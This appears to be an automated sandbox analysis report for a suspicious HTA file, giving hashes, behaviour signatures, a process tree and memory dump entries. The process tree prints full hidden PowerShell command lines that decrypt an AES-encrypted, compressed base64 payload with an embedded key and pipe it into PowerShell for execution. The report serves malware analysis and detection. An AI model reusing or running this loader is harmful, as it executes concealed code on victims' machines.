Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25-01-2024 13:56

General

  • Target

    freorra.hta

  • Size

    1.1MB

  • MD5

    b46fee5771193152ad4e92a2bd75436d

  • SHA1

    5ebc0363b9cfede7ce711e59b9c7bfbe7188a9d1

  • SHA256

    ab6492900c66882416208e9554d85504ad7f7fe6e9674945887bc6ac47ebfdbd

  • SHA512

    8125952c8a04a908d8245da32c77f0a5f6d5e60a925311deb4f24419cf6cd849d36e93e33505a2da2a07672148fd260409d4b34b8e2d49c6120abd27f2ca1e36

  • SSDEEP

    1536:87it7MAZeK2PbPqFBQ04r76oogc2KQ1GLXETTtjIm+lIWFkKI5nPz3iQYgol7VS0:Si6AZr2PbPmBQhru1biXk

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\freorra.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0b7dab35f977016b2b725f7005801194

    SHA1

    4ca9989d74b78d42f939155b18aa6248201169fe

    SHA256

    ac727e1be9d2b2f38b5c320626e10f285f18ea6a593709b80468e6b8de6cb529

    SHA512

    3ecb964a6add764b98b168036178de0ed4fd5d1350bb62cd0ecf961d4e524292a3618761139998261ff68082f5c97a33126f8ba690c540f70de56567c6d75399

  • memory/1580-2-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/1580-3-0x0000000001D80000-0x0000000001DC0000-memory.dmp

    Filesize

    256KB

  • memory/1580-4-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/1580-5-0x0000000001D80000-0x0000000001DC0000-memory.dmp

    Filesize

    256KB

  • memory/1580-6-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-19-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-20-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-21-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-18-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-17-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-35-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-22-0x0000000002A40000-0x0000000002A80000-memory.dmp

    Filesize

    256KB

  • memory/2648-24-0x0000000002A40000-0x0000000002A80000-memory.dmp

    Filesize

    256KB

  • memory/2648-23-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-25-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-36-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB